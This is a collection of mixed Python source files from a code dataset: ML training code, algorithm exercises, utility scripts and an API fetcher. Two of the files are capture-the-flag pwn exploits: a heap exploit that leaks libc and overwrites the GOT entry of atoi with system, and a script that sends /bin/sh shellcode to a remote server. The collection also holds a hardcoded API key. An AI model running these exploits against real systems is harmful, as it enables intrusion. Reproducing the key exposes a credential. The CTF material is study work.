coding=utf-8\nimport numpy as np\nfrom scipy import optimize as opt\nfrom . import LogisticRegression\n\nimport os\n\ndef NAG(grad, x_0, L, sigma):\n '''Nesterov's Accelerated Gradient Descent for strongly convex functions'''\n\n x = y = x_0\n root_kappa = np.sqrt(L / sigma)\n if root_kappa < 5:\n L *= 9\n root_kappa *= 3\n r = (root_kappa - 1) / (root_kappa + 1)\n r_1 = 1 + r\n r_2 = r\n\n while np.linalg.norm(grad(y)) > 1e-15:\n print(np.linalg.norm(grad(y)))\n y_last = y\n y = x - grad(x) / L\n x = r_1*y - r_2*y_last\n\n return y\n\n\nclass GisetteClassification(LogisticRegression):\n def __init__(self, n_agent, kappa=1, **kwargs):\n\n super().__init__(n_agent, int(6000/n_agent), 5000, kappa=kappa, noise_ratio=None, **kwargs)\n # self.LAMBDA = 1e-8\n\n def _generate_data(self):\n\n def _load(fname):\n print('Loading %s' % fname)\n data_path = os.path.abspath(os.path.expanduser(fname + '.data'))\n with open(data_path) as f:\n data = f.readlines()\n data = np.array([[int(x) for x in line.split()] for line in data], dtype=float)\n\n label_path = os.path.abspath(os.path.expanduser(fname + '.labels'))\n with open(label_path) as f:\n labels = np.array([int(x) for x in f.read().split()], dtype=float)\n\n labels[labels < 0] = 0\n # label= np.array([[int(x) for x in line.split()] for line in data])\n return data, labels\n\n self.X_total, self.Y_total = _load('~/gisette_data/gisette_train')\n self.X_val, self.Y_val = _load('~/gisette_data/gisette_valid')\n\n # norm = np.linalg.norm(self.X_total, 2) / np.sqrt(self.m_total)\n norm = 6422.51797924869151756866\n self.X_total /= norm + self.LAMBDA\n \n self.X = self.split_data(self.m, self.X_total)\n self.Y = self.split_data(self.m, self.Y_total)\n\n self.x_min = self.w_min = NAG(self.grad, np.random.randn(self.dim), self.L, self.sigma)\n\n def validate(self, w):\n Y_hat = self.X_val.dot(w)\n Y_hat[Y_hat >= 0] = 1\n Y_hat[Y_hat < 0] = 0\n return np.mean(Y_hat == self.Y_val)\n\n\n\nif __name__ == '__main__':\n\n import matplotlib.pyplot as plt\n\n n = 10\n m = 1000\n dim = 10\n noise_ratio = 0.01\n\n p = GisetteClassification(n, m, balanced=False)\n p.grad_check()\n p.distributed_check()\n\n p = GisetteClassification(n, m, n_edges=4*n)\n p.grad_check()\n p.distributed_check()\n # p.plot_graph()\n\n print('w_min = ' + str(p.w_min))\n print('f(w_min) = ' + str(p.f(p.w_min)))\n print('f_0(w_min) = ' + str(p.f(p.w_min, 0)))\n print('|| g(w_min) || = ' + str(np.linalg.norm(p.grad(p.w_min))))\n print('|| g_0(w_min) || = ' + str(np.linalg.norm(p.grad(p.w_min, 0))))\n\n # plt.show()\n","sub_path":"problems/gisette_classification.py","file_name":"gisette_classification.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"654017224","text":"n = int(input())\na = list(map(int, input().split()))\n\n# global count\ncount = 0\n\ndef merge(a, b):\n i = 0\n j = 0\n res = []\n global count\n\n while i < len(a) and j < len(b):\n if a[i] < b[j]:\n res.append(a[i])\n i+=1\n else:\n res.append(b[j])\n count += len(a)-i\n j+=1\n \n while i < len(a):\n res.append(a[i])\n i+=1\n while j < len(b):\n res.append(b[j])\n j+=1\n return res\n\ndef mergeSort(a):\n if len(a) <= 1:\n return a\n left = a[:len(a)//2]\n right = a[len(a)//2:]\n\n left = mergeSort(left)\n right = mergeSort(right)\n\n return merge(left, right)\n \n\nmergeSort(a)\nprint(count)","sub_path":"codeforces/contests/timur/sorting/H_inversion.py","file_name":"H_inversion.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"175959149","text":"class Garden(object):\n \n CHILDREN = ['Alice', 'Bob', 'Charlie', 'David', \n 'Eve', 'Fred', 'Ginny', 'Harriet', \n 'Ileana', 'Joseph', 'Kincaid', 'Larry', \n 'Samantha', 'Patricia', 'Xander', 'Roger']\n PLANTS = {p[0]: p \n for p in ['Clover', 'Grass', \n 'Radishes', 'Violets']}\n\n def __init__(self, diagram, students=None):\n self.rows = diagram.split('\\n')\n self.students = students or self.CHILDREN\n self.students.sort()\n\n def plants(self, child):\n i = self.students.index(child)\n plants = [[self.PLANTS[plant] for plant in row] \n for row in self.rows]\n return sum([row[0 + 2 * i:2 + 2 * i] \n for row in plants], [])","sub_path":"kindergarten-garden/kindergarten_garden.py","file_name":"kindergarten_garden.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"58981168","text":"#+++++++++++++++++++exp.py++++++++++++++++++++\n#!/usr/bin/python\n# -*- coding:utf-8 -*- \n#Author: Squarer\n#Time: 2020.11.15 20.20.51\n#+++++++++++++++++++exp.py++++++++++++++++++++\nfrom pwn import*\n\n#context.log_level = 'debug'\ncontext.arch = 'amd64'\n\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')\n#libc=ELF('/lib/i386-linux-gnu/libc.so.6')\n\ndef add(size,cont):\n\tsh.sendlineafter('Your choice :','1')\n\tsh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))\n\tsh.sendlineafter('Content:',str(cont))\n\ndef edit(index,cont):\n\tsh.sendlineafter('Your choice :','2')\n\tsh.sendlineafter('Index :',str(index))\n\tsh.sendafter('Content: ',str(cont))\n\ndef delete(index):\n\tsh.sendlineafter('Your choice :','4')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show(index):\n\tsh.sendlineafter('Your choice :','3')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show_addr(name,addr):\n\tlog.success('The '+str(name)+' Addr:' + str(hex(addr)))\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn',27634)\n\n#extending\nadd(0x18,'A'*8)\nadd(0x18,'B'*8)\nedit(0,'A'*0x18+'\\x41')\ndelete(1)\n\n#leaking\nadd(0x38,'A'*8) #1\npayload = 'A'*0x10 + p64(0) + p64(0x21)\npayload += p64(0x38) + p64(elf.got['atoi'])\nedit(1,payload)\n\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8,'\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr',libc_addr)\nshow_addr('system_addr',system_addr)\n\n#hijacking\nedit(1,p64(system_addr))\n#gdb.attach(sh,'b*0x400E6D')\n\nsh.interactive()\n","sub_path":"npuctf_2020_easyheap/exp_r.py","file_name":"exp_r.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"36597314","text":"print(\"First Matrix: \")\r\na = [[1,2,3],\r\n [2,3,4],\r\n [3,4,5]]\r\nfor f in a:\r\n print(f)\r\nprint(\"\\nSecond Matrix: \")\r\nb = [[4,5,6],\r\n [5,6,7],\r\n [6,7,8]]\r\nfor s in b:\r\n print(s)\r\nprint(\"\\nAfter Division of a & b Matrix\")\r\nresult = [[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\nfor i in range(len(a)):\r\n for j in range(len(a[0])):\r\n result[i][j] = a[i][j] / b[i][j]\r\nfor r in result:\r\n print(r)","sub_path":"Data-Structure-main/Two dimensional array/Division of ab matrix.py","file_name":"Division of ab matrix.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33077057","text":"#!python\n#!/usr/bin/env python\nfrom pwn import *\n#p = process(\"./shellcode\")\np = remote(\"120.79.114.39\",10001)\nshellcode = \"\\x31\\xc9\\xf7\\xe1\\x51\\x68\\x2f\\x2f\\x73\"\nshellcode += \"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xb0\"\nshellcode += \"\\x0b\\xcd\\x80\"\npayload = shellcode\np.send(payload)\np.interactive()\n\n","sub_path":"日程科目题目/PWN/shellcode/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"253393063","text":"\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils._text import to_native\nfrom ansible.module_utils.vmware import( PyVmomi,vmware_argument_spec)\n\ntry:\n from pyVmomi import vim\nexcept ImportError:\n pass\n\n\nclass PyVmomiHelper(PyVmomi):\n def __init__(self, module):\n super(PyVmomiHelper, self).__init__(module)\n \n\ndef main():\n\n argument_spec = vmware_argument_spec()\n argument_spec.update(\n name=dict(type='str'),\n uuid=dict(type='str')\n )\n\n module = AnsibleModule(argument_spec=argument_spec,\n required_one_of=[['name', 'uuid']],\n mutually_exclusive=[['name', 'uuid']],\n )\n\n pyv = PyVmomiHelper(module)\n\n # http://pubs.vmware.com/vsphere-55/topic/com.vmware.wssdk.apiref.doc/vim.SearchIndex.html\n search_index = pyv.content.searchIndex\n\n # without exception find managed objects using durable identifiers that the\n # search index can find easily. This is much better than caching information\n # that is non-durable and potentially buggy.\n\n vm = pyv.get_vm()\n\n if not vm:\n print(u\"Could not find a virtual machine to examine.\")\n exit(1)\n \n print(u\"Found Virtual Machine\")\n print(u\"=====================\")\n details = {'name': vm.summary.config.name,\n 'instance UUID': vm.summary.config.instanceUuid,\n 'bios UUID': vm.summary.config.uuid,\n 'path to VM': vm.summary.config.vmPathName,\n 'guest OS id': vm.summary.config.guestId,\n 'guest OS name': vm.summary.config.guestFullName,\n 'host name': vm.runtime.host.name,\n 'last booted timestamp': vm.runtime.bootTime}\n\n for name, value in details.items():\n print(u\" {0:{width}{base}}: {1}\".format(name, value, width=25, base='s'))\n\n print(u\" Devices:\")\n print(u\" --------\")\n for device in vm.config.hardware.device:\n # diving into each device, we pull out a few interesting bits\n dev_details = {'key': device.key,\n 'summary': device.deviceInfo.summary,\n 'device type': type(device).__name__,\n 'backing type': type(device.backing).__name__}\n\n print(u\" label: {0}\".format(device.deviceInfo.label))\n print(u\" ------------------\")\n for name, value in dev_details.items():\n print(u\" {0:{width}{base}}: {1}\".format(name, value,\n width=15, base='s'))\n\n if device.backing is None:\n continue\n\n # the following is a bit of a hack, but it lets us build a summary\n # without making many assumptions about the backing type, if the\n # backing type has a file name we *know* it's sitting on a datastore\n # and will have to have all of the following attributes.\n if hasattr(device.backing, 'fileName'):\n datastore = device.backing.datastore\n if datastore:\n print(u\" datastore\")\n print(u\" name: {0}\".format(datastore.name))\n # there may be multiple hosts, the host property\n # is a host mount info type not a host system type\n # but we can navigate to the host system from there\n for host_mount in datastore.host:\n host_system = host_mount.key\n print(u\" host: {0}\".format(host_system.name))\n print(u\" summary\")\n summary = {'capacity': datastore.summary.capacity,\n 'freeSpace': datastore.summary.freeSpace,\n 'file system': datastore.summary.type,\n 'url': datastore.summary.url}\n for key, val in summary.items():\n print(u\" {0}: {1}\".format(key, val))\n print(u\" fileName: {0}\".format(device.backing.fileName))\n print(u\" device ID: {0}\".format(device.backing.backingObjectId))\n\n print(u\" ------------------\")\n# start\nif __name__ == \"__main__\":\n main()\n","sub_path":"Sonam/playbook/test/sonamdrivemodule.py","file_name":"sonamdrivemodule.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"182947965","text":"import json\r\nimport requests\r\nimport time\r\n\r\n\r\ndef millis():\r\n return int(round(time.time() * 1000))\r\n\r\n\r\nclass Weather:\r\n def __init__(self, city, country, wind_speed, wind_direction, visibility, temperature, pressure, humidity,\r\n condition):\r\n self.city = city\r\n self.country = country\r\n self.wind = str(wind_speed) + \" km/h towards \" + str(wind_direction)\r\n self.visibility = visibility\r\n self.temperature = temperature\r\n self.pressure = pressure\r\n self.humidity = humidity\r\n self.condition = condition\r\n\r\n def __str__(self):\r\n return \"Location: {}, {},\\n Windspeed: {},\\n Visibility: {},\\n Temp: {},\\n Pressure: {},\\n Humidity: {},\" \\\r\n \"\\n Condition: {}\".format(self.city, self.country, self.wind, self.visibility, self.temperature,\r\n self.pressure,\r\n self.humidity, self.condition)\r\n\r\n\r\nclass WeatherGrabber:\r\n def __init__(self):\r\n self.key = \"a25b24117bec726b9c93c34d988c9c9a\"\r\n self.last_result = None\r\n self.last_request_time = millis()\r\n self.request_interval = 10 * 60 * 1000\r\n\r\n def should_get_again(self):\r\n return self.last_result is None or millis() - self.last_request_time > self.request_interval\r\n\r\n def get_current_weather(self, city):\r\n if city is not None and type(city) == str and self.should_get_again():\r\n # Get the data\r\n request = requests.get(\r\n \"https://api.openweathermap.org/data/2.5/weather?q={0}&APPID={1}\".format(city, self.key))\r\n\r\n # Check the status code\r\n if request.status_code == 200:\r\n # Decode the received data\r\n wheather_data = json.loads(request.content.decode('utf-8'))\r\n\r\n # Return a prepared weather object\r\n return self.prepare_wheather(wheather_data)\r\n\r\n # Return null\r\n return None\r\n\r\n @staticmethod\r\n def prepare_wheather(weather_data):\r\n if weather_data is not None:\r\n try:\r\n # Prepare the weather data to make it convertable into a weather object\r\n prepared_city = weather_data['name']\r\n prepared_country = weather_data['sys']['country']\r\n prepared_wind_speed = weather_data['wind']['speed']\r\n prepared_wind_degrees = weather_data['wind']['deg']\r\n prepared_visibility = weather_data['visibility']\r\n prepared_temperature = weather_data['main']['temp']\r\n prepared_pressure = weather_data['main']['pressure']\r\n prepared_humidity = weather_data['main']['humidity']\r\n prepared_condition = \"\"\r\n except:\r\n return None\r\n\r\n # Loop over the condition in order to create a condition string\r\n for condition in weather_data['weather']:\r\n prepared_condition = prepared_condition + condition['main'].lower() + \", \"\r\n\r\n # Remove the last two characters\r\n prepared_condition = prepared_condition[:-2]\r\n\r\n # Return a new weather object containing the prepared data\r\n return Weather(prepared_city, prepared_country, prepared_wind_speed, prepared_wind_degrees,\r\n prepared_visibility, prepared_temperature, prepared_pressure, prepared_humidity,\r\n prepared_condition)\r\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"548491662","text":"import sys\nimport re\nfrom os.path import exists\n\nscript, inputfile1, inputfile2 = sys.argv\n\ndef open_parse_file(file_name):\n filenames = {}\n with open(file_name) as f:\n for line in f:\n line=re.sub(r\"[^0-9a-zA-Z]+\", \"\", line)\n k=line\n if k in filenames:\n filenames[k]+=1\n else:\n filenames[k]=1\n return filenames\n\n\n\nif __name__ == '__main__':\n if not exists(inputfile1) or not exists(inputfile2):\n print(\"file(s) not found\")\n sys.exit(0)\n\n diff=0\n g_filenames = open_parse_file(inputfile1)\n g_filenames2 = open_parse_file(inputfile2)\n\n for i in g_filenames:\n if i in g_filenames2:\n if g_filenames[i] != g_filenames2[i]:\n diff+=1\n print(\"not same times,\",inputfile1, \"has \",(i,g_filenames[i]))\n print(\"not same times,\",inputfile2, \"has \",(i,g_filenames2[i]))\n del g_filenames2[i]\n else:\n diff+=1\n print(i,\"from\", inputfile1,\"not found in\",inputfile2)\n if len(g_filenames2) > 0:\n for i in g_filenames2:\n diff+=1\n print(i,\"from\", inputfile2,\"not found in\",inputfile1)\n\n if diff==0:\n print(\"Identical files!\")\n else:\n print(\"found\",diff,\"diffs\")\n \n\n","sub_path":"python/find-diff.py","file_name":"find-diff.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"161685269","text":"#! /usr/bin/env python3\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom preprocess import join_columns\n\nbase_url = \"https://tigerweb.geo.census.gov/tigerwebmain/\"\nres = requests.get(base_url + \"TIGERweb_tract_current.html\")\nsoup = BeautifulSoup(res.content, features=\"lxml\")\n\nall_data = pd.Series(dtype=\"int\")\ncount = 0\nfor state in soup.find_all(\"td\"):\n count += 1\n link = state.find(\"a\").attrs[\"href\"]\n name = \" \".join(state.find(\"a\").text.split())\n try:\n data = pd.read_html(base_url + link)[0]\n except ValueError:\n print(link)\n continue\n join_columns(\n data,\n lambda x, y: \"{:02}{:03}\".format(x, y),\n (\"FIPS\", [\"STATE\", \"COUNTY\"]),\n )\n join_columns(\n data,\n lambda x, y: x + y,\n (\"AREA\", [\"AREALAND\", \"AREAWATER\"]),\n )\n data = data[[\"FIPS\", \"AREA\"]]\n data = data.groupby(\"FIPS\").sum()\n data = data[\"AREA\"]\n all_data = all_data.append(data)\n\nall_data.to_pickle(\"fips_area.pkl\")\n","sub_path":"get_areas.py","file_name":"get_areas.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357027141","text":"n = int( input () )\ntemp = 0\ncont = 1\npos = 1\nwhile cont < 100:\n temp = int(input())\n cont = cont + 1\n if temp > n:\n n = temp\n pos = cont\nprint(\"%d\" %n)\nprint(\"%d\" %pos)\n","sub_path":"Python/1080.py","file_name":"1080.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"531285234","text":"import pandas as pd \nfrom sklearn.externals import joblib\n\ntraining = pd.read_csv('data/raw/trainingData.csv', \n header = None, \n names = ['session_id', 'start_time', 'end_time', 'product_views'])\ntraining_labels = pd.read_csv('data/raw/trainingLabels.csv', header = None, names = ['gender'])\ntraining['is_female'] = training_labels['gender'] == 'female'\n\ntraining.start_time = pd.to_datetime(training['start_time'], format='%Y-%m-%d %H:%M:%S')\ntraining.end_time = pd.to_datetime(training['end_time'], format='%Y-%m-%d %H:%M:%S')\n\n\ntraining['week_day'] = training.start_time.apply(lambda x: x.weekday())\ntraining['start_of_months'] = training.start_time.apply(lambda x: x.date().day <= 5)\ntraining['end_of_months'] = training.start_time.apply(lambda x: x.date().day >=25)\ntraining['hour'] = training.start_time.apply(lambda x: x.hour)\ntraining['session_duration'] = (training.end_time - training.start_time).apply(lambda x: x.seconds)\n\ntraining.groupby(['week_day']).agg({'is_female': lambda x: sum(x)/sum(training['is_female'])})\ntraining.groupby(['start_of_months']).agg({'is_female': lambda x: sum(x)/sum(training['is_female'])})\ntraining.groupby(['end_of_months']).agg({'is_female': lambda x: sum(x)/sum(training['is_female'])})\ntraining.groupby(['hour']).agg({'is_female': lambda x: sum(x)/sum(training['is_female'])})\n\ntraining.groupby(['week_day']).agg({'is_female': lambda x: sum(~x)/sum(~training['is_female'])})\ntraining.groupby(['start_of_months']).agg({'is_female': lambda x: sum(~x)/sum(~training['is_female'])})\ntraining.groupby(['end_of_months']).agg({'is_female': lambda x: sum(~x)/sum(~training['is_female'])})\ntraining.groupby(['hour']).agg({'is_female': lambda x: sum(~x)/sum(~training['is_female'])})\n## count the categorical \n## Time features \n\n## product Views\ntraining['product_views_array'] = training['product_views'].apply(lambda x: [i.split('/')[:4] for i in x.split(';')])\ntraining['cate_0'] = training['product_views_array'].apply(lambda x: [i[0] for i in x])\ntraining['cate_1'] = training['product_views_array'].apply(lambda x: [i[1] for i in x])\ntraining['cate_2'] = training['product_views_array'].apply(lambda x: [i[2] for i in x])\ntraining['product'] = training['product_views_array'].apply(lambda x: [i[3] for i in x])\n## Categorical features \n\n## Item features \nlist_flattening = lambda x: pd.Series([inner for outer in x for inner in outer])\ncate_0 = set(list_flattening(training['cate_0']))\ncate_1 = set(list_flattening(training['cate_1']))\ncate_2 = set(list_flattening(training['cate_2']))\nproducts = set(list_flattening(training['product']))\n\ntraining.to_csv('data/processed/training.csv', index = False)\njoblib.dump(cate_0, 'data/processed/cate_0.jl')\njoblib.dump(cate_1, 'data/processed/cate_1.jl')\njoblib.dump(cate_2, 'data/processed/cate_2.jl')\njoblib.dump(products, 'data/processed/products.jl')","sub_path":"miscellaneous/exploring.py","file_name":"exploring.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"599730131","text":"import numpy as np\n\n'''\nWhat is the output of the perceptron if input=[2.4, 3.0], \nweights=[-0.5, 0.2], bias=1.0 (activation function - sign)?\n'''\n\n# weights * input + bias = [-0.5, 0.2] * [[2.4], [3.0]] + 1.0\n# = -0.5 * 2.4 + 0.2 * 3.0 + 1\n# = -1.2 + 0.6 + 1 = 0.4\ndef sigmoid(X):\n return 1/(1+np.exp(-X))\n\nweights = np.asarray([0.5, 0.2])\ninpt = np.asarray([2.4, 3.0])\nbias = 1.0\noutput = np.sum(inpt*weights) + bias\n\nprint(\"output: \", output)\nprint(sigmoid(output))\n\n\nprint('----------------------')\n\n'''\nIf the current weights of a perceptron are [0.2, 0.4],\ntheir gradients are=[-2.4, -1.2], and the learning rate is 0.1.\n What are the weights after the weights update operation?\n'''\n\n# W_nou = W - learning_rate * gradients\ncurentWeights = [0.2, 0.4]\ngradients = [-2.4, -1.2]\nlr = 0.1\n\nnewWeights = []\nfor i in range(len(curentWeights)):\n newWeights.append(curentWeights[i]-lr*gradients[i])\n\nprint(newWeights)\n\n'''\nCare sunt punctele in care dreapta \nde separare a percetronului w = [-4, 2], b = [2] intersecteaza axele?\n'''\n# pentru a ti da a doua coordonata a punctului, o bagi pe prima la X, rulezi\n# si ti o returneaza pe a doua\n# ex: pentru x = 0 da -1 -> (0,-1)\n\n\ndef f(x, w, b, c=0):\n # given x1, return x2 such that [x1,x2] are on the line w.x + b = c\n return (-w[0] * x - b + c) / w[1]\n\nw = [-4,2]\nb = 2\nx = 0.5\n\nprint(f(x,w,b))","sub_path":"ml/lab/algoritmi/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"499556878","text":"import requests, json, time\nfrom datetime import datetime\nfrom math import ceil\nfrom src import app, db, Album, Artist\nfrom .spotify_auth import SpotifyAuth\n\n\nclass SpotifyFetcher(SpotifyAuth):\n SPOTIFY_URL_NEW_RELEASES = \"https://api.spotify.com/v1/browse/new-releases\"\n SPOTIFY_LIMIT_NEW_RELEASES = 50\n SPOTIFY_EXPIRATION_MESSAGE = \"The access token expired\"\n\n def __init__(self, access_token, expires_in, refresh_token):\n self.__set_init(access_token, expires_in, refresh_token)\n\n def __set_init(self, access_token, expires_in, refresh_token):\n self.__access_token = access_token\n self.__expires_in = expires_in\n self.__refresh_token = refresh_token\n self.__access_token_time = datetime.now().timestamp()\n\n def __get_spotify_releases_url(self, offset):\n return f\"{self.SPOTIFY_URL_NEW_RELEASES}?limit={self.SPOTIFY_LIMIT_NEW_RELEASES}&offset={offset}\"\n\n def request(self, offset=0):\n headers = {\n \"Authorization\": f\"Bearer {self.__access_token}\"\n }\n url = self.__get_spotify_releases_url(offset)\n response = requests.get(url, headers=headers)\n status_code = response.status_code\n if status_code == 429:\n # Too many requests, we must wait a bit\n retry_after = int(response.get('headers').get('Retry-After'))\n time.sleep(retry_after)\n response_data = json.loads(response.text)\n if response_data.get('error'):\n if response_data.get('error').get('status') == 401 and response_data.get('error').get('message') == self.SPOTIFY_EXPIRATION_MESSAGE:\n # refresh token only when we're told to\n auth_resp = self.refreshAuth(self.__refresh_token)\n access_token = auth_resp.get('access_token')\n expires_in = auth_resp.get('expires_in')\n refresh_token = auth_resp.get('refresh_token')\n self.__set_init(access_token, expires_in, refresh_token)\n return self.request(offset)\n return response_data\n \n def fetch_all(self):\n releases = []\n offset = 0\n first_batch = self.request()\n if \"error\" in first_batch:\n url = self.__get_spotify_releases_url(offset)\n app.logger.error(f'Error while fetching {url}. Returning empty array.\\n{json.dumps(first_batch)}')\n return []\n releases += first_batch.get('albums').get('items')\n total = first_batch.get('albums').get('total')\n nb_pages = ceil(total / self.SPOTIFY_LIMIT_NEW_RELEASES)\n if nb_pages > 1:\n for i in range(1, nb_pages):\n offset = i * self.SPOTIFY_LIMIT_NEW_RELEASES\n batch = self.request(offset)\n if \"error\" in batch:\n app.logger.error(f'Error while fetching {url}. Skipping batch.\\n{json.dumps(batch)}')\n continue\n releases += batch.get('albums').get('items')\n\n return releases\n\n def import_releases(self):\n releases = self.fetch_all()\n app.logger.info(f'Fetched {len(releases)} releases')\n db_adds = 0\n for release in releases:\n #check if release is already in the database (avoid duplicates)\n existing_release = Album.query.filter_by(spotify_id=release['id']).first()\n if existing_release:\n continue\n artists = release['artists']\n artist_ids = []\n for artist in artists:\n # check if artist is already in the database (avoid duplicates)\n existing_artist = Artist.query.filter_by(spotify_id=artist['id']).first()\n if not existing_artist:\n existing_artist = self.parse_artist(artist)\n db.session.add(existing_artist)\n db_adds += 1\n artist_ids.append(existing_artist)\n db.session.add(self.parse_release(release, artist_ids))\n db_adds += 1\n db.session.commit()\n app.logger.info(f'Finished import ({db_adds} insertions)')\n \n def parse_release(self, release, artists):\n release = Album(\n spotify_id=release['id'],\n name=release['name'],\n uri=release['uri'],\n href=release['href'],\n album_type=release['album_type'],\n images=release['images'],\n external_urls=release['external_urls'],\n available_markets=release['available_markets'],\n artists=artists\n )\n return release\n\n def parse_artist(self, artist):\n artist = Artist(\n spotify_id=artist['id'],\n name=artist['name'],\n uri=artist['uri'],\n href=artist['href'],\n external_urls=artist['external_urls']\n )\n return artist","sub_path":"src/spotify_fetcher.py","file_name":"spotify_fetcher.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"230455495","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-8-19 下午3:56\n# @Author : yaoqi\n# @Email : yaoqi_isee@zju.edu.cn \n# @File : preprocessor.py\n\n\"\"\"Preprocess images and bounding boxes for detection\nThis script can be applied in training phase for data augmentation and test phase(multiply input for better results)\n\nA preprocessing function receives a set of input,\nimages: image data of numpy array format, shape should be [height, width, 3] and all images should have the same size\nlabels: bounding box annotation, shape should be [N, 4] encoding [xmin,ymin,xmax,ymax] which are normalized to [0,1]\noptions: a dict indicating which preprocessing method to use, current supported methods includes random flip, random crop,\n color distortion. an example of option can be options = dict{'flip':1, 'crop':1, 'distortion':1}\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport random\nimport numpy as np\nimport cv2\nimport time\n\n\ndef pointxita2corners(px):\n \"\"\"\n change the representation of a rotated bbox from point-xita form to four corner form\n :param px:[x,y,xita,w,h]\n :return:[x1,y1,x2,y2,x3,y3,x4,y4] in anti-clockwise order\n \"\"\"\n assert px.shape[1] == 5, \\\n 'input px should have 5 elements'\n [x, y, xita, w, h] = np.hsplit(px, 5)\n\n x1 = x + 0.5 * h * np.cos(xita) - 0.5 * w * np.sin(xita)\n y1 = y - 0.5 * h * np.sin(xita) - 0.5 * w * np.cos(xita)\n\n x2 = x - 0.5 * h * np.cos(xita) - 0.5 * w * np.sin(xita)\n y2 = y + 0.5 * h * np.sin(xita) - 0.5 * w * np.cos(xita)\n\n x3 = x - 0.5 * h * np.cos(xita) + 0.5 * w * np.sin(xita)\n y3 = y + 0.5 * h * np.sin(xita) + 0.5 * w * np.cos(xita)\n\n x4 = x + 0.5 * h * np.cos(xita) + 0.5 * w * np.sin(xita)\n y4 = y - 0.5 * h * np.sin(xita) + 0.5 * w * np.cos(xita)\n\n return np.hstack((x1, y1, x2, y2, x3, y3, x4, y4))\n\n\ndef corners2pointxita(corners):\n \"\"\"\n change the representation of a rotated bbox from corner form into point-xita form\n :param corners:\n :return:\n \"\"\"\n assert corners.shape[1] == 8, \\\n 'input corner should have 8 elements'\n [x1, y1, x2, y2, x3, y3, x4, y4] = np.hsplit(corners, 8)\n uc_x = 0.5 * (x1 + x4)\n uc_y = 0.5 * (y1 + y4)\n bc_x = 0.5 * (x2 + x3)\n bc_y = 0.5 * (y2 + y3)\n\n tmp = np.zeros((corners.shape[0], 1))\n xita = np.zeros((corners.shape[0], 1))\n ind = np.where(uc_x != bc_x)\n tmp[ind] = np.arctan((bc_y[ind] - uc_y[ind]) / (bc_x[ind] - uc_x[ind]))\n tmp[np.where(uc_x == bc_x)] = np.pi / 2\n xita[tmp > 0] = np.pi - tmp[tmp > 0]\n xita[tmp <= 0] = -1 * tmp[tmp <= 0]\n\n # tmp = np.pi / 2 if uc_x == bc_x else np.arctan((bc_y - uc_y) / (bc_x - uc_x))\n # xita = np.pi - tmp if tmp > 0 else -1 * tmp\n\n cx = 0.5 * (uc_x + bc_x)\n cy = 0.5 * (uc_y + bc_y)\n w = np.sqrt(np.power(x1 - x4, 2) + np.power(y1 - y4, 2))\n h = np.sqrt(np.power(x1 - x2, 2) + np.power(y1 - y2, 2))\n return np.hstack((cx, cy, xita, w, h))\n\n\ndef random_horizontal_flip(images, bboxes):\n\n def fliplr_box(bboxes):\n \"\"\"\n flip the bbox horizontally\n :param bboxes:point-xita form\n :return:flip_img and flip_bbox in np.array form\n \"\"\"\n\n corners = pointxita2corners(bboxes)\n corners[:, 0::2] = 1 - corners[:, 0::2]\n new_bboxes = corners2pointxita(corners)\n\n return new_bboxes\n\n flag = random.randint(0, 1)\n if flag == 1:\n flip_img = np.fliplr(images)\n flip_bbox = fliplr_box(bboxes)\n else:\n flip_img = images\n flip_bbox = bboxes\n\n return flip_img, flip_bbox\n\n\ndef random_crop(images, bboxes, jitter):\n\n def correct_corners(corners, dx, dy, sx, sy):\n \"\"\"\n correct corner coordinates according to value of random shift and scale\n :param corners:\n :param dx:\n :param dy:\n :param sx:\n :param sy:\n :return:\n \"\"\"\n assert corners.shape[1] 